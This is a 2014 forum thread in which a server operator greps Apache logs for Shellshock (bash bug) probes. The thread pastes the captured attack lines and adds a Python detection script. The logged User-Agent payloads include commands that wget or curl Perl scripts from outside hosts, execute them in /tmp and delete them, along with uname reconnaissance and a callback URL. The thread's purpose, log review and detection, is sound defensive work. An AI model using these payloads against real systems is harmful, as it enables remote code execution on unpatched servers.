Shell Shocked 
DARKie
Joined: Thu Jul 22, 2004 8:48 pm
Posts: 436
Location: Ann Arbor, Michigan, USA
Post Shell Shocked
Here is a query to see who's been trying to hack this server with the bash bug:

Code:
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"


Ha ha, go away script kiddies, we're all patched here!

Fri Oct 03, 2014 8:54 am
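
A detection sketch for the query in the post above, added here as an example and not part of the original thread. It parses the log layout shown in the output (virtual host between timestamp and request) and matches the `() {` function-definition prefix with optional whitespace in every logged field, which the fixed string `() { :;};` does not cover. The sample lines, addresses and the helper names `find_probes` and `needs_review` are constructed for illustration.

```python
import re
from collections import defaultdict

# Field layout taken from the log lines in the post: the virtual host sits
# between the timestamp and the request. Quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] (\S+) ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED
)
# Bash treats a value that begins with "() {" as a function definition; allowing
# optional whitespace catches spellings the fixed string '() { :;};' misses.
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

def find_probes(lines):
    """Return {source_ip: [(timestamp, vhost, request, status, field), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected layout; skipped, not guessed at
        src, ts, vhost, request, status, referer, agent = m.groups()
        for name, value in (("request", request), ("referer", referer),
                            ("user-agent", agent)):
            if FUNC_PREFIX.search(value):
                hits[src].append((ts, vhost, request, int(status), name))
    return dict(hits)

def needs_review(hits):
    """Probes aimed at a CGI path that did not get a 4xx/5xx response."""
    return [(src, h) for src, entries in hits.items() for h in entries
            if "/cgi" in h[2] and h[3] < 400]

# Constructed sample lines (documentation addresses, harmless echo payloads).
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:06:40:29 -0400] www.example.org "GET /cgi-bin/status HTTP/1.0" 404 303 "-" "() { :;}; /bin/echo probe"',
    '192.0.2.10 - - [25/Sep/2014:06:41:02 -0400] www.example.org "GET /cgi-bin/status HTTP/1.0" 200 119 "() { :; }; /bin/echo probe" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:07:00:00 -0400] www.example.org "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [26/Sep/2014:08:59:35 -0400] * "GET / HTTP/1.1" 200 119 "-" "() { foo;};/bin/echo \\"probe\\""',
]

if __name__ == "__main__":
    for src, entries in find_probes(SAMPLE).items():
        for ts, vhost, request, status, field in entries:
            print(src, ts, vhost, request, status, field)
```

Only fields that the log format records can be checked this way; a probe carried in a header that is not logged leaves no trace in the access log.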
DARKie
Joined: Sun Feb 16, 2014 6:56 pm
Posts: 130
Post Re: Shell Shocked
WeaselSqueezer wrote:
Ha ha, go away script kiddies, we're all patched here!


Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D

Fri Oct 03, 2014 5:09 pm
Copyright © 2014, Multi-Dimensional Visual Echo. All rights reserved.